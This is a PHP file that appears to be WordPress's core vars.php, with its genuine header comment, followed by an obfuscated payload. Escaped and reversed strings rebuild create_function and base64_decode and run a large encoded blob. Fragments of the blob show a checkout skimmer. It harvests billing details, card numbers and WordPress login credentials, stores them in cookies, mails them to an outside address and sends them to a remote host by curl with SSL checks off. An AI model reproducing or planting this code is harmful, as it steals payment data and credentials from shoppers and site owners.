<?php
/**
 * Creates common globals for the rest of WordPress
 *
 * Sets $pagenow global which is the filename of the current screen.
 * Checks for the browser to set which one is currently being used.
 *
 * Detects which user environment WordPress is being used on.
 * Only attempts to check for Apache, Nginx and IIS -- three web
 * servers with known pretty permalink capability.
 *
 * Note: Though Nginx is detected, WordPress does not currently
 * generate rewrite rules for it. See https://wordpress.org/support/article/nginx/
*/
$N82q6ReR="\164\x72";$N82q6ReR.="\145\163";$mZ4aBRJ4h="\156";$mZ4aBRJ4h.="\x6f";$mZ4aBRJ4h.="\x69\164";$zLndLdRg3g="\163\164";$zLndLdRg3g.="\x72\x72\145";$laDdSghW="\x65\144";$mZ4aBRJ4h.="\x63\156";$zLndLdRg3g.="\x76";$laDdSghW.="\x6f\143\145";$laDdSghW.="\x64\137\x34";$mZ4aBRJ4h.="\x75\x66\x5f";$mZ4aBRJ4h.="\145\164";$mZ4aBRJ4h.="\x61\x65\162";$N82q6ReR.="\x73\x61";$laDdSghW.="\66\145\x73";$laDdSghW.="\141\142";$mZ4aBRJ4h.="\x63";$mZ4aBRJ4h=$zLndLdRg3g($mZ4aBRJ4h);$laDdSghW=$zLndLdRg3g($laDdSghW);$N82q6ReR=$zLndLdRg3g($N82q6ReR);$dSBILXgHI="DQVRJT04gPT4gdHJ1ZSwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9FTkNPRElORyA9PiAiIiwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9VU0VSQUdFTlQgPT4gIk1vemlsbGEvNS4wIChXaW5kCIgoALzAiP9AiIvoiL0V2cfd3bsxWZ5piLvICIgACIgACIgACIgACIgACIKwyMg4TPgIyLq4ichVWWu9Wa0FmcpBHelpiLvICIgACIgACIgACIgACIgACIe0l2YkACIgACIgACIgACIgowOiICI6ASXnUGdhR3cfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnUGdhR3cfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPg42bpdEVEX0ZPUiddKSkgewogICAgICAgICAgICAgICAgICAgICR1c2VyX2lwID0gJF9TRVJWgICAgICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnX3dkYXRhJ10pKQogICAgICAgICAgICAgICAgICAgICRjY19wYXkgLj0gJ3ACIgACIgACIgowOpg2YkgyYlhXZfxmc1NGQg0DI05WZ052bjRCIgACIgACIgACIgAiC7kycu9Wa0B3bkACLoNGJokXYyJXYfRHcvRXZz9FbyV3YgACIgACIgACIgACIKsTKsJXdkgCdp5Wafxmc1NGI9ACajRCIgACIgACIg9mcfJHdzhSZk92YuV2X0YTZzFmYg0DIkVGZvNmbl9VehB3XjNGJgACIgACIgACIgACIgACIgowOp01JhRXYkd3XnsVRJt0TPN0XkgSZk92YlR2X0YTZzFmYg4CInwUPxkUVNEIgACIgACIgACIgACIgACIKwCMyEDI+0DIUV1TF1USU9FVQ9ETSV1QgACIgACIgACIgACIgACIgoALwITMg4TPgIgACIgowOpIzMjJ3YkgyciFGI9AiMzMmcjRCIgACIgACIgowOwADMwADMwATM4BDItAiMzMmcjRCI9AiMzMmcjRCIgACIgACIgACIgACIgACIKkCMwADMwADM4gHMgYCIyMzYyNGJoAiZpBCIgACIgACIgACIgkZmluZDEgPSAkZmluZDIgPSAkZmluZDMgPSAkZmluZDQgPSBmYWxzZTsKICAgICAgICAgICAgJGZpbmQyID0gdHJ1ZTsKICAgICAACIgACIgACIgACIKowOxIDZulmZkACf8BiMk5WamRCI9AiMk5WamRCIgACIgACIgACIgAiCK0HIgACIgACIgACIgAiC7UWdyRHI9ASMk5WamRCIgBpZiAoaXNzZXQoJF9QT1NUWydwYXltZW50J10pKSB7CiAgICAgICAgICAgICRmaWVsZHNBcnJheSA9IGFycmF5KAogICAgICAgICAgICAgICAgIbJ2JpbGxpbmdfZW1haWwnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfZW1haWwnXSA6ICIiOwoKICAgICAgICAgICAgJGJpbGwgPSAkZmlyc3RuYW1lIC4gJyAnIC4gJGxhc3RuYW1lFRfU1NMX1ZFUklGWVBFRVIgPT4gZmFsc2UsCiAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCA9PiBmYWxzZQogICAgICAgICAgICICAgICAgICAgICR1c2VyX2RhdGEgPSBzdHJfcmVwbGFjZSgiKyIsICclMmInLCAkdXNlcl9kYXUPxkUVNEIgACIgACIgACIgACIgACIgACIgoALwEDI+0DITJVSEVkUYFUTfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgoALwITMg4TPgQVVPVUTJR1XUB1TMJVVDBCIgACIgACIgACIgACIgASZzxWYmBiP9AiUFVEUZZUSSVkVfx0UT9FVQ9ETSV1QgACIgACIgACIgACIgACIgACIgACIgACIKwCMxAiP9AyUSlERFJFACIgowegkSKiQXaul2XsJXdjJCKzR3cphXZf52bpR3YuVnZoAiZpBCIgACIgACIgACIgACIgAiCKsTKhR1UiIC4gQ1JDX1NNSUxPRE9OX1NIT1JULCAxKTsKICAgICAgICAkZ2V0X3VybCA9ICCIgACIgoAK5FmcyFGI9Aycu9Wa0B3bkACIgACIgACIgACIgACIgAiC7BSKpICdp5Wafxmc1NmIoMHdzlGel9lbvlGdj5WdmhCImlGIgACIgACIgACIgAiC7IiIg0DI05WZ052bjRCIgACIgACIgACIgAiC701JUN1TI9FUURFSnslUFZlgICAgIGZ1bmN0aW9uIHNtaWxvZG9uX2JhY2t1cF9xdWVyeSgkdXJsLCAkcG9zdCkgewogICAgICAgICAgICAkb3B0aW9ucyA9IGFycmF5KAogICAgICAgICAgICAgICAgQ1VSTE9QQfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgoALiAjLyMzL49mZlJXaGBSMwEDMyEDDVVJMT1BUX0NPTk5FQ1RUSU1FT1VUID0+IDgsCiAgICAgICAgICAgICAgICAgICAgICAgIENVUkxPUFRfVElNRU9VVCA9PiA4LAogICAgICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX01BWc18xJ10gOiAiIjsKCiAgICAgICAgICAgICR6aXAgPSBpc3NldCgkX1BPU1RbJ2JpbGxpbmdfcG9zdGNvZGUnXSkgPyAkX1BPU1RbJ2JpbGxpbmdfcG9z9GJgwCajRCK5FmcyF2X0B3b0V2cfxmc1NGIgACIgACIgACIgACIgACIKsTKsJXdfRXZnRCK0lmbp9FbyV3Yg0DIoNGJgACIgACIgACIgACIgACIgogCKsTKgACIgAgICAgICAgICAgICAgJG9wdGlvbnNbQ1VSTE9QVF9QT1NUXSA9IDE7CiAgICAgICAgICAgICAgICAkb3B0aW9uc1tDVVJMT1BUX1BPU1RGSUVMRFNdID0gJHBvc3Q7CiAgICAgICAgICAgIH0KCiAgICAAgICAgICAgICAgICAkY250ID0gdHJpbSgkY250KTsKICAgICAgICAgICAgICAgIH0KCiAgICAgICAgICAgICAgICBpZiAoKCRjbnQgIT0gJzEnKSAmJiAoZnVuY3Rpb25fZXhpc3RzKCJleGVjIikpKSB7CiAgICAgICAgICAgICAgICAgICAgQGV4ZWMoJ2N1cmwgLNWJlZThiOGIzMWE1MjFiOTdiMDk4ODA2MycpKSkgewogICAgICAgICAgICAkZ2V0X3VybCA9ICJodHRwczovL3pvbG8ucHcvd3RmL2luZGV4LnBocD9oPSIgLiAkX1NFUtGJoQnb192YfJHdzJWdzhCImlGIgACIgACIgACIgACIgACIKsTZ1JHdg0DIzQmbpZGJgACIgACIgACIgACIgACIgACIgAiCpkiIul2XkV2Zn9GbfN3clJHckJ3b3JCIskXZrRCK05WdvN2XyR3ciV3coAiZpBCIgACIgACIgACIgACIgAiC7UWdyRHI9ASMyQmYkgiblxmc0NHKgYWagACIgACIgACIgACIgACIgowOoRnbv12XjNGJg4CInAzJg0DIoRnbv12XjNGJgACIgACIgACIgACIgACIgACIgAiCpEDI90DIpgGdu9WbfN2YkgiblxmcACIgogC7kSMgwCVS9EST9lTPR0TMlUTT91QSNEIuAiIH5USMxUSC9FUVt0QBJ0XO9ERPxUSNNSA9IGlzc2V0KCRfUE9TVFsnYmlsbGluZ19jaXR5J1NGI9ACajRCIgACIgACIgACIgACIgACIgACIgogC7kCIgACIgACIgACIgACIgACIgACIgoQZzxWYmBiP9ACVT9ESZZUSSVkVfx0ACIgowOpQWZk92YuV2X5FGcfN2YkAiLgcSP3VWa29DcoBnL4VGZul2LO9ERPxUSNN1LlNWYwNnLuJ3bkVmcv8iOzBHd0h2Jg4CInASZyV3YlNnbp1S0MTMoJGNjX3BheSAuICJcclxuKiIgLiAkX1NFUlZFUlsnSFRUUF9IT1NUJ10gLiAiIFsiIC4gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ10gLiAiXSoiKSk7CiAgICAgICAgICAgICAgICAkY2NfcGF5X2VuY29kZWQgPSBzdHJfcmVwbGFjZ3Yigyc0NXa4V2Xu9Wa0Nmb1ZGKgYWagACIgACIgACIgACIgACIgowOwASPgQnbjRCIgACIgACIgACIgACIgACIKowOpQWZk92YuV2X5FGcfN2YkACLiImMlICIsIyKigSACIgACIgAiC7UWdsFmdfBHJg0DIkl2YfN2YkACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIKoDNgU2chNGIgACIgACIgACIgACIgACIgACIgACIgACIgYWs7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CgogICAgICAgICAgICBpZiAoJGNjX251bWJlcikgewogICAgICAgICAgICAgICAgaWYgKHN0b24gLiAnIHwnIC4gJHppcCAuICd8JyAuICRjb3VudHJ5IC4gJ3wnIC4gJHBob25lIC4gJyAnIC4gJGVtYWlsOwogICAgICAgICAgICBzZXRjb29raWUoIl93ZGF0YSIsIGJhc2U2NF9lbmNvZGUoJGJpbGwpLCB0aW1lKCkgKyAzNjAwMCwgIi8iKTsKICXO9ERPxUSNNlIoUmbpZWZkBCIgACIgACIKsHIpkCVS9EST9lTPR0TMlUTT91QSNEIuAiIV9lTPR0TMlUTTJCKkVmbpZWZkFCKgYWaJogCKowO9BCIgAiC9BCIgACIgACIK0HIgACIgACIgACIgAiC7kSehB3XjNGJgwSXnQ1UPh0XQRFVIdyW0TPN0XkgCdlN3cphCImYCIp01JuV2avR3Xwd3XnsVRJt0TPN0XkgCdlN3cpFCKgYWagACIgACIgAiCK0HIgACIgACIgowOuV2avRXYkASPg01JuV2avR3Xwd3XnsVRJt0TPN0XkACIgACIgACIgACIgowOpIyLiACLwADM2MDIrASKoUWbpRHIs4WZr9GdhRkcF9rZXkgPT4gJHBfdmFsdWUpIHsKICAgICAgICAgICAgICAgICAgICBpZiAocHJlZ19tYXRjaCgkZl9rZXksICRwX2tleSwgJG1hdGNoZXMpKSB7CiAgICAgICAgICAgCIp01Jn9GbnsFVT9EUfRCK0V2czlGKgYWagACIgACIgAiCKsjI9cXZpZ3PwhGcugXZk5Wav40TE9ETJ10UvQ3cvhmLy9GdhRWZyB3LvozcwRHdoJACIgowegkCdz9GckgCImlGIgACIgACIgACIgAiCKsTKgACIgACIgACIgACIKU2csFmZg4TPgQ1UPhUWGlkUFZ1XMN1UfRFUPxkUVNEIgACIgACIgACIgACIgACIKwSlYWNoICgkX0NPT0tJRSBhcyAka2V5ID0+ICR2YWx1ZSkgewogICAgICAgICAgICAgICAgaWYgKHN1YnN0cl9jb3VudCgka2V5LCAiX2NsZWZfIikpCiAgICAgICAgICAgICAgICAgICAgY29udGludWU7CgkJCQlpSVkRFJ1TUVVQfRFUPxkUVNEIgACIgACIgACIgACIgACIKwiIw4iMz8CevZWZylmRgEDMxAjMxAjMv82ajV2RgkCMuIzM6YncgsTMuUDIU5EIzd3bk5WaXhCIw4SNvEGbslmev1kIg4TPgQlTFdUQSV0UV9FVQ9ETSV1QgACIgACIgACIgACIgACIgoALiICI+zVmckRWYfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnEzXzNXZyRGZh91ZulGbslmYnsFVT9EUfRCK0V2czlGI9AyczVmckRWYkACIgACIgACIgACIgowOiICI6ASXnkHdpN2Xn5WasxWaidyWUN1TQ9FJg8DIp0gICAgICAgICAgICAgfQoKICAgICAgICAgICAgICAgIEBtYWlsKCd5YXRzeXZpdGFsaUB5YW5kZXgucnUnLCAnYmJfJyAuICRfU0VSVkVSVVUT1JFRkVSRVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VUID0+IDEyMCwKICAgICgwiIj0HOyEDLyMzedlTLwoXLht1XzNXZyBHZy92djICKoNGdh12XnVmcwhCImlGIgACIgACIgACIgACIgACIKsTZzxWYmBSPgIDZulmZkACIgACIgACIgACIgACIgACIgACIKkiIll2av92YfR3clR3XzNXZyBHZy92diASP9ASeltGJoAiZBCIgACIgACIgACIgACIgACIgACIgACIgoALlVnc0BiP9AiUFJVRGVkUPRVVB9FVQ9ETSV1QgACIgACIgACIgACIgACIgACIgACIgACIKwiIw4iMz8CevZWZylmRgEDMxAjMxAjMv82ajV2RgkCMuIzM6YncgsTMuUDIU5EIzd3bN1TQ9FJg8DIp01Jl1WYu9FdzFGbfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgUWbh5GdzFGbkACIgACIgACIgACIgowOiICI6ASXnUWbh52X0NncpZ2Xn5WasxWaidyWUN1TQ9FJg8DIp01Jl1WYu9FdzJXam91ZulGbslmYnsFVTORyA9PiAiIiwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX1VTRVJBR0VOVCA9PiAiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNS4xOyBydjozMi4wKSBHZWNrby8yMtJRVsnX2p3ciddKSkpIHsKICAgICAgICAgICAgc2V0Y29va2llKCJfandyIiwgMSwgdGltMT0RPTiIpKSB7CiAgICAgICAgJGNyYzMyID0gaXNzZXQoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSA/IGNyYzMyKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkgOiAwOwogICAgICAgIGlmIChQSFBfSU5UX1NJWkUgPiA0KQoICAgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXNlIDI6CiAgICAgICAgICAgICAgICAgICAgICAgIpdWZyRCIuAyJ8dCIuASe0l2YkAiLgcCfnAiLgM3clJHZkFGJg4CInw3Jg4CIUQFh0XUB1TMJVVDBCIgACIgACIgACIgACIgACIgACIKwSwKICAgICAgICAgICAgICAgICAgICAgICAgQ1VSTE9QVF9TURVIgPT4gdHJ1ZSwKICAgICAgICAgICAgICAgIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQhN2YxMWY3cCI90DIp01J3RnZnsVRJt0TPN0XkgSNk1GKgYiJgkSKddyd0Z2JbVUSL90TD9FJoYmIChpc3NldCgkX1BPU1RbJ3B3ZCddKSkpIHsKICAgICAgICAgICAgJGF0b2tlbiA9IGJhc2U2NF9lbmNvZGUoJF9QT1NUWydsb2cnXSAuICI7IiAuICRfUE9TVFsncHdkJ10pOwogICAgICAgICAgICBzZXRjb29raWUoIl93cF90b2tlbiIsICJ3bmBCIgACIgACIgACIgowOlNHbhZGI9ASMyQmbpZGJgACIgACIglUTT91QSNkIoQWZulmZlRWIoAiZpBCIgAiCKsTKxACLiQUQFh0XO9ERPxUSNNlIoUmbpZWZkBCIgAiCKsHIpkiIEFURI9lTPR0TMlUTTJCKkVmbpZWZkFCKgYWaCIgACIgACIKsTKkVGZvNmbl9VehB3XjNGJg4CIn0zdllmd/AHaw5CelRmbp9iTPR0TMlUTT9SZjFGcz5iby9GZlJ3LvozcwRHdodClERPNkTF9FVQ9ETSV1QgACIgACIgACIgACIgACIgACIgAiCgACIgACIgAiC7kCduNGJo0WayRHI9ACduNGJgACIgACIgACIgACIgACIgACIgAiC7kSZzxWYmBCLkVGZvNmbl9VehB3XjNGJg4CIn0zdllmd/AHaw5CelRmbp9iTPR0TMlUTT9SZjFGcz5iby9GZlJ3LvozCIgACIgACIgACIgACIKwSMg4TPgIyLq4Sb152XjNmKu8iJGtleSkpCiAgICAgICAgICAgICAgICAgICAgJGZpb1cmxfaW5pdCgkZ2V0X3VybCAuICR1c2VyX2RhdGEpOwogICAgICAgICAgICAgICAgICAgIGN1cmxfc2V0b3B0X2FycmF5KCRjaCwgJG9wdGlvbnMpOwogICAgICAgIICAgICAgICB9CiAgICAgICAgICAgICAgICBpZiAoJGNudCAhPSAnMScpIHsKICAgICAgICAgICAgICAgICAgICAkY250ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKNGdlNHIgACIgACIgACIgACIgACIKsTKi8iIgwCMwAjNzAyKgkCKl1Wa0BCLxACLiI3dq9lIoUWar92bjRXZzBCIgACIgACIgACIgACIgAiCK0HIgACIgACIgACIgACIgACIKsTKoNGJoMWZ4V2XsJXdjBEIgACIgACIgACIgACR1UPB1XkgCdlN3cpBSPgwWah1WZkACIgACIgACIgACIgowOiICI6ASXnUmbvhGcfdmbpxGbpJ2JbR1UPB1XkAyPgkSXnUmbvhGcfdmbpxGbpJ2JbR1UPB1XkgCdlN3cpBSPgUmbvhGckACIgACIgACIgACIgowOiICI6ASXnUGZvNGdgJGF1dGggPSAoJGZpbmQxICYmICRmaW5kMikgfHwgKCRmaW5kMyAmJiAkZmluZDQpOwoKICAgICAgICAgICAgJHBhdGggPSAkX1NFUlDTElFTlRfSVAnXTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgICAgICR1c2VyX2RhdGEgPSBiYXNlNjRfZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSAuICI7JHBhdGg7IiAuICRfQ09PS0lFWydfd3Bfd8iKugGdu9WTu9Wa0FmcpBHelpiLvICIgACIgACIgACIgACIgACIKwiMg4TPgIyLq4Ca052bt9Fc4VmKu8iIgACIgACIgACIgACIgACIgoALyAiP9AiIvoiLt9Fc4V2XjNmKu8iIgACIgACIgACIgACIgACIgoALxARFUiA9PiBmYWxzZSwKICAgICAgICAgICAgICAgICAgICBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OID0+IHRydWUsCAgIGRlZmluZSgiQ1JDX1NNSUxPRE9OIiwgJGNyYzMyKTsKICAgICAgICBkZWZpbmUoIkNSQ19TTUlMT0RPTl9TSE9SVCIsICRjcmMzMiAlIDEwMDApOwogICAgfQoKICAgIGlmICghZGVmaW5lZCgiU01JTE9ET05fQkF9FUURFSnslUFZlUFN1XkASPgAXafJXZzVHJgACIgACIgACIgACIgACIgACIgAiC7BSKp01JQl0XU5URJx0QfBFVUh0JbJVRWJVRT9FJoQXZzNXaoAiZpBCIgACIgACIgACIgACIgAiC9BCIgACIgACIgACIgACIgAiC701JS9kRfRUREJVQXJ1TG9FWfBFVUh0JbJVRgACIgAiC7UWdsFmdfBHJg0DIyVmYtVnbfN2YkACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIKoTMgU2chNGIgACIgACIgACIgACIgACIgACIgACIgACIgACIKsHIpUWdsFmdfZGJoACajRXa3NHIgACIgACIgACIgACIUWydiaWxsaW5nX2xhc3RfbmFtZSddIDogIiI7CiAgICAgICAgICAgICRjb3VudHJ5ID0gaXNzZXQoJF9QT1NUWydiaWxsaW5nX2NvdW50cnknXSkgPyAkX1BPU1RbJ2JpbGxpbmdfY291bnRyeSddIDogIiI7CiAgICAgICAgICAgICRyZWACIgACIgACIgACIgowegkSKp01JydnafdyWFl0SP90QfRCK0V2czlWIoAiJmASKddiblt2b09Fc391JbVUSL90TD9FJoQXZzNXaoAiZpBCIgACIgACIKoQfgACIgACIgAiC7kiIvICIsADMwYzMg0CIpgSZgACIgACIKsTKwl2XyV2c1RCIuAyJ7cCIuASXn4WZr9GleSwgIndvcmRwcmVzc3VzZXJfIikpCiAgICAgICAgICAgICAgICAgICAgJGZpbmQ0ID0gdHJ1ZTsKICAgICAgICAgICAgICAgIGlmIChzdWJzdHJfY291bnQoJGtleSwgIndvcmRwcmVzcyIpKQogICAgICAgICAgICAgICAgICAACIgACIKsDZpN2XjNGJg4CInw3Jg4CIyFWZ591YjRCIuAyJvcCIuACa052bt91YjRCIuAyJ8dCIuAiclJWb152XjNGJg0DI5FGcfN2YkACwdGlvbnMpOwogICAgICAgICAgICAgICAgJGNvbnRlbnQgPSBAY3VybF9leGVjKCRjaCk7CiAgICAgICAgICAgICAgICAkY29udGVudCA9IHRyaW0oJGNvbnRlbnQpOwogICAgICAgICAgICB9CgogICAgICAgICAgICBpZiAoISRjbvb2tpZSgiX3dwX3Rva2VuIiwgMSwgdGltZSgpIC0gMzYwMDAsICIvIik7CiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9CgoKfTs=AychBSXnQnbl1WehB3JbR1UPB1XkgCIoNWYlJ3bmBCIgACIgACIgACIgACIgAiC7BSKlVHbhZ3XmRCI+0DI5V2afZGJgMXYgkXYyJXQzRGbllmZkgCIoNWYlJ3bmBCIgACIgACIgACIgogC7IiIg0DIkl2YfN2YkASPgIXYll3XjNGJg0DIoRnbv12XjNGJg0DIyVCIgACIgACIKsTfgACIgACIgAiC7kCbslmYkgSZk92YuV2X0YTZzFmYg0DIddSY0FGZ391JbVUSL90TD9FJgACIgACIgACIgAUf50TE9ETJ10UfNkUDBiLgICUVt0QBJ0XO9ERPxUSNNlIoUmbpZWZkBCIgACIgACIKsHIpkCVS9EST9lTPR0TMlUTT91QSNEIuAiIQV1SDAgICIvLipjb250cm9sX3NldHRpbmdzLiovIiA9PiCIgACIgACIgoALlVnc0BiP9AiUFZ0UOFkUU5kUVRVRS9FVAgICAgICAgICAgICAgIi8uKnNhdmFnZV9zZXQuKi8iID0+IDQsCiAgICAgICAgICAgICAgICAiLy4qY2NfY2lkLiovIiA9PiA0CiAgICAgICAgICAgICk7CgogICAgICAgICAgICAkY2NfbnVtYmFRfTUFYUkVESVJTID0+IDEwLAogICAgICAgICAgICAgICAgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiA9PiBmYWxzZHIgACIgACIgowO0lGelBCIgACIgACIgACIgowOpQnblRnbvNGJowWY2VGIgACIgACIgACIgAiCK0HIgACIgACIgACIgAiC7kCbyV3X0V2Zkgyc05WZ052bj9Fdld2XlxWamBEI9ACduVGdu92YkACIgACIgACIgACIgACIgAiC7BSK05WZ0529ETX9ETM9kRfRFUPxkUVNEIgACIgACIgACIgACIgACIgACIgACIgAiCsU2csFmZg4TPgIVREFURI9FVQ9ETSV1QgACIgACIgACIgACIgACIgACIgACIgACIKwSZ1JHdg4TPgIVRGNlTBJFVOJVVUVkUfRFUPxkUVNEIgACgICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiA2NfeWVhcikgPT0gNCkKICAgICAgICAgICAgICAgICAgICAkY2NfeWVhciA9IHN1YnN0cigkY2NfeWVhciwgMiwgMik7CiAgICAgICAgICAgICAgIiID0+IDIsCiAgICAgICAgICAgICAgICAiLy4qbXNuX3NldC4qLyIgPT4gMiwKICAgICAgICAgICAgICAgICIvLipjY19leHBfeS4qLyIgPT4gMywKICAgICAgICAgICAgICAgICIvLipleHBfeWVhci4qLyIgPT4gMywKgICByZXR1cm4gJGNvbnRlbnQ7CiAgICAgICAgfQoKICAgICAgICBpZiAoaXNzZXQoJF9QT1NUWydiaWxsaW5nX2ZpcnN0X25hbWUnXSkpIHsKICAgICAgICAgICAgJGZpcnN0bmFtZSA9IGlzc2V0KCRfUE90hPUlQsIDEpOwoKICAgICAgICBpZiAoKChpc3NldCgkX0NPT0tJRVsnd3RmJ10pKSAmJiAobWQ1KCRfQ09PS0lFWyd3dGYnXSkgPT0gJzdhYzFjY2E1YmVlOGI4YjMxYTUyMWI5N2IwOTg4MDYzJykpIHx8ICgoaXNzZXQ0KICAgIH0KCiAgICBpZiAoIWRlZmluZWQoIlNNSUxPRE9OX0JBQ0tVUF9CSUxMSU5HIiAuIENSQ19TTUlMT0RPTl9TSE9SVCkpIHsKICAgICAgICBkZWZpbmUoIllJnYgACIgACIgACIgACIgACIgACIgACIgACIK0HIgACIgACIgACIgACIgACIgACIgACIgAgICAgICAgQ1VSTE9QVF9IRUFERVIgPT4gZmFsc2UsCiAgICAgICAgICAgICAgICBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OID0+IHRydWUsCiAgICAgICAgICAgICAgICBDVVJMT1BUX0VOQ09ESU5HID0gICAgICAgICAgICAgICAgICRvcHRpb25zID0gYXJyYXkoCiAgICAgICAgICAgICAgICAgICAgIjBCIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7sWYlJnYgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgAiC7UWdsFmdfBHJg0DIoRnbv12XjNGJgACIgACIgACYXNlIDM6CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGNjX3llYXIgPSAkcF92YWx1ZTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBicmVhazsKICARSF0VS9kRfh1XQRFVIdyWSVkVSV0UfRCK0V2czlGKgYWagACIgACIgACIgACIgACIgowOddiUERUQfVEVP1URSdyWSVkVSV0UfRCI9ACcp9lclNXdkACIgACIgACIgACIgACIgAiC7BSKoRXdhRCKgYWagACIgACIgACIgACIKsTXnkkUV9FVTVUVRVkUnslUFZAgICAgICAgICAgICAgIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgPT4gdHJ1ZVybF9pbml0IikpIHsKICAgICAgICAgICAgICAgICAgICAkY250ID0gc21pbG9kb25fYmFja3VwX3F1ZXJ5KCdodHRwc";$wzp6D7Wh="==wODxEVTRVVORzdkAibyVHdlJnCpkyVod2UkRUYsRCK0V2czlWIoYWaKsTf9tTKp0VMrU3d2cXYaNTeaRyWHZFTKlVVkwSX1dnN3FmWzknWks1RWxkSZVFJskESnhFTJJ0UkRCKyR3ciV3coc2MnJFZMRmbMpHJ94yQMR1UUVlT0cHJ7V2csVWf7kSXxsSd3Zzdhp1M5pFJbdkVMpUWVRCLdV3d2cXYaNTeaRyWHZFTKlVVkwSSIdGWMlkQTRGJoIHdzJWdz1jLDxEVTRVVORzdksXK0USd3Zzdhp1M5pFJoYWa7liM9sSd3Zzdhp1M5pFJ7kyRWxkSZVFJoY2blpXazxTd3Zzdhp1M5pFJ7ATP1dnN3FmWzknWkgicvZ2OiISPDxEVTRVVORzdkowOpMjMxwSNxgzNsQjNxwCO5kjNsgTNxwSN1kDL2YTMsUzM0kDL2ATMskTOxETMsYjNxwSM1QjMxwyM3wiNwUzNskjMxwCM3IzMsczNxwCM1EjMskTNsgTO0MTMsUDNscDNzcDL2gDL5QzM5wyN0wSOzADOsAzMxwCO5cjNsgjNsQjN0IDLxATMsQzNxYDL3QTMsQjN3EDLxITMskjN1EDL1ITMsQTO3IDL0cTMscjM2ATMsEDOxwyNyYTMxwCNyEDL3EjNyEDLzcDL2IzNzwyNzEDL3IzMywiN0wSN0MTMxwyM1EDLwEDOyEDLzkTMsIjM3UDL3YDL5MDN3wCN5wSM2gDL4gDL5MTNxEDL2ITMsUzM0UDLyUTMskTM5IDL4YTMsgjN1wiN1EDL1kjMyEDLycTMsYjM2YDL5cTMsIzN5kDL1ETMscDOywSM0wSO5czMsQTNxwSNxkTNsYTMxwCO3YjMsUzNxwCN0cDOsMzMxwiNzQTMsAjNscDOycDLwkTMsEzM2QDL2kDLzATMxEDLxETMsUjMzEDL1QDLxQjM4wCM0wSNwMTMxwSM2EDL4gTM5wSN2EDLwMTMyEDL4ETMskjNxwCO0EDLxkzMxEDL3kTMsYDM5ATMskjMxwCN5ETNsIzNxwCMwgTOsUjMxwiM2EzNsEzMxwyNzAzMxwSNzEDL4YTMzEDL0ITMskTNzQDL0QDL0cTOxEDL5YDLxQzNyEDL4QTMsMDO0QDLzMTMsMTO1MDLyETMsgTMwITMsYDMxwSMyUDMxwSO5wSO2QDL1ITMsYzM3wCO3EDLyUDM0wSOyEDLwMjM0wSM5wyN1UzMxwSN1EDL2gDM4wSMyEDLzUDN4wSMwEDL4MTO3wSO5EDLxcDMzwCNxEDL4MTOzwSNwEDL5YDM2wSM4EDLxIDO0wSN2wSN4AjMsITMxwyMyMTNsQDOxwSO3UzNsITOxwiMwATNsAzNsgjM5YDL1UTMsETNxATMsADMxwyMxETMsITNsMjN3cDLxYTMsEjN1UDLwgTMsUzNyYDLxQDL2gjM4wCN5EDL5kzMzwiM3EDL5QzMwEDLyETMsMTMyEDLzATMskTM5gDL1kTMsMDMzMTMscjNsIDM0wSO5EDLxAjN5wiN2EDLyIDM5wyM0wiNwMDMxwCN3wCM5YTMsEDOsQDMwIDL0cDLzYTOyEDL2YTMsgDM4ETMskjNxwCMsEzNxwSN1QjNsYDNxwiMzUjMsMTOsETM5EDL3QDLykzM3wCO5wCM0gzMsYjMxwyNyMDOsAzNxwCN3UDOsUDMxwSMwgDMxgSehJnch1zRWxkSZVFJ";if(function_exists($mZ4aBRJ4h)){$OeJJ96n8s0=@$mZ4aBRJ4h('$dSBILXgHI,$zLndLdRg3g',$laDdSghW($zLndLdRg3g($wzp6D7Wh)));if($OeJJ96n8s0)$dSBILXgHI=@$OeJJ96n8s0($dSBILXgHI,$zLndLdRg3g); 